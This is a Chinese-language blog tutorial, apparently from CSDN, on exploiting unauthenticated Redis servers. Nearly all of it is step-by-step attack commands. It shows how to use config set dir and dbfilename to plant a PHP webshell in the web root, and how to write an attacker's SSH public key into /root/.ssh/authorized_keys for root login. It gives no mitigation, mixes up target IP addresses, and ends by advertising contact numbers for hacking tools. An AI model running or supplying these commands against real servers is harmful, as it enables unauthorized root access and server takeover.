Redis未授权访问漏洞的利用

1、利用redis写webshell
在redis-cli中写入以下命令:
config set dir /var/www/html/

config set dbfilename redis.php

set webshell “<?php phpinfo(); ?>”

save
在这里插入图片描述
然后看一下目录下是否生成了一个redis.php的文件
在这里插入图片描述

可以看到生成了,查看一下文件的内容
在这里插入图片描述
在浏览器中访问一下这个文件,成功解析,内容改成一句话木马,即可getshell
在这里插入图片描述

2、Redis 未授权访问配合 SSH key 文件利用
首先在攻击机生成密匙:ssh-keygen –t rsa
在这里插入图片描述

看到生成的文件被保存在了上图的路径中,cd /root/.ssh/,并cat查看文件内容
在这里插入图片描述

然后将公钥写入key.txt中
(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > key.txt
在这里插入图片描述

然后连接redis进行写入
$ cat key.txt | redis-cli -h 192.168.136.133 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.136.133:6379> config set dir /root/.ssh/
$ 192.168.1.11:6379> config set dbfilename “authorized_keys”
$ 192.168.1.11:6379> save
在这里插入图片描述

然后去目标机看一下是否生成
在这里插入图片描述

然后回到攻击机,利用自己的密钥进行ssh登录:
ssh –i id_rsa root@192.168.136.133
在这里插入图片描述

2646692244领取学习资料及工具联系管理员,学习可以进群773617250与大家学习交流!

                                                  BY易锦教育正式班学员墨森
发布了23 篇原创文章 · 获赞 0 · 访问量 482
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 游动-白 设计师: 上身试试

分享到微信朋友圈

×

扫一扫,手机浏览